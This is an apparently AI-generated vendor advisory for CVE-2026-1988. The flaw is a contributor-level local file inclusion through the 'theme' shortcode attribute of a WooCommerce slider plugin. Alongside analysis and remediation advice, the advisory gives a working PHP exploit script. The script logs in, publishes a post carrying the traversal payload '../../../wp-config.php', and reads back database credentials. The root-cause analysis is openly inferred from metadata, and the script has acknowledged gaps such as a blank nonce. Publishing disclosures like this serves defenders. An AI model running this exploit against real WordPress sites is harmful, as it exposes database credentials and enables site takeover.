Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1988: Flexi Product Slider and Grid for WooCommerce <= 1.0.5 – Authenticated (Contributor+) Local File Inclusion via 'theme' Shortcode Attribute (flexi-product-slider-grid)

CVE ID CVE-2026-1988
Plugin flexi-product-slider-grid
Severity High (CVSS 7.5)
CWE 98
Vulnerable Version 1.0.5
Patched Version
Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1988 (metadata-based):
This vulnerability is an authenticated local file inclusion (LFI) in the Flexi Product Slider and Grid for WooCommerce WordPress plugin. The flaw resides in the `flexipsg_carousel` shortcode handler. Attackers with Contributor-level permissions or higher can exploit the `theme` parameter to perform directory traversal and include arbitrary PHP files, potentially leading to remote code execution. The CVSS score of 7.5 reflects a high-impact attack requiring authentication but low attack complexity.

Atomic Edge research infers the root cause from the CWE-98 classification and vulnerability description. The plugin’s shortcode handler likely uses the `theme` parameter value directly in a PHP `include()` or `require()` statement without proper sanitization. The description confirms the parameter is concatenated into a file path. This allows directory traversal sequences like `../../../` to escape the intended theme directory. The code likely lacks validation against path traversal and does not restrict included files to a safe allowlist.

The exploitation method involves an authenticated user creating or editing a post. The attacker embeds the `[flexipsg_carousel]` shortcode with a malicious `theme` parameter. A typical payload would be `theme=../../../wp-config.php` to include the WordPress configuration file, or `theme=../../../malicious.php` to execute arbitrary PHP code already present on the server. The shortcode is processed when the post is viewed, triggering the file inclusion. The attack vector is the WordPress post editor, and the endpoint is the site’s frontend where the shortcode renders.

Effective remediation requires implementing strict input validation and path sanitization. The plugin should validate the `theme` parameter against a predefined list of allowed theme names. It must also sanitize the input to remove directory traversal sequences. A secure implementation would use a basename function to strip directory components, then verify the resulting filename exists within a specific, safe directory. The fix should also implement proper capability checks, though the description indicates authentication is already required.

Successful exploitation leads to severe impacts. Attackers can read sensitive files like `wp-config.php`, exposing database credentials and authentication keys. Local file inclusion can enable remote code execution if the attacker can upload a malicious PHP file through another vector or if they include writable log files containing PHP code. This vulnerability grants Contributor-level users the ability to execute code with the web server’s privileges, leading to full site compromise, data theft, and server-side attacks.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1988 - Flexi Product Slider and Grid for WooCommerce <= 1.0.5 - Authenticated (Contributor+) Local File Inclusion via 'theme' Shortcode Attribute
<?php
/*
Assumptions:
1. The target site has the vulnerable plugin (<=1.0.5) installed.
2. We have valid Contributor-level (or higher) credentials.
3. The plugin's shortcode is `flexipsg_carousel` with a `theme` parameter.
4. The vulnerability triggers when a post containing the shortcode is viewed.
5. The file inclusion happens server-side during shortcode rendering.

This PoC demonstrates the attack flow:
1. Authenticate to WordPress.
2. Create a new post containing the malicious shortcode.
3. Visit the post to trigger the file inclusion.
*/

$target_url = 'https://example.com';
$username = 'contributor_user';
$password = 'password123';
$file_to_include = '../../../wp-config.php'; // Target sensitive file

// Step 1: Authenticate and get session cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);
$response = curl_exec($ch);

// Step 2: Create a new post with the malicious shortcode
$post_title = 'Test Post with Malicious Shortcode';
$post_content = '[flexipsg_carousel theme="' . $file_to_include . '"]';

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/post-new.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'post_title' => $post_title,
        'content' => $post_content,
        'publish' => 'Publish',
        '_wpnonce' => '' // Nonce would need to be extracted from a previous page load
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true
]);
// Note: A full PoC would first GET the post-new page to extract the nonce.
// This simplified version assumes the nonce is known or bypassed.
$response = curl_exec($ch);

// Step 3: Extract the new post URL from response or redirect
// In practice, parse the response to find the post permalink.
// For this PoC, we assume we know the post ID or URL structure.
$post_url = $target_url . '/?p=123'; // Example post URL

// Step 4: Visit the post to trigger the file inclusion
curl_setopt_array($ch, [
    CURLOPT_URL => $post_url,
    CURLOPT_HTTPGET => true,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEFILE => 'cookies.txt'
]);
$response = curl_exec($ch);

// Check if the included file content appears in the response
if (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) {
    echo "Potential LFI successful. Check response for sensitive data.n";
    // In a real attack, the included PHP file would execute, not just output source.
} else {
    echo "LFI attempt may have failed or file not found.n";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School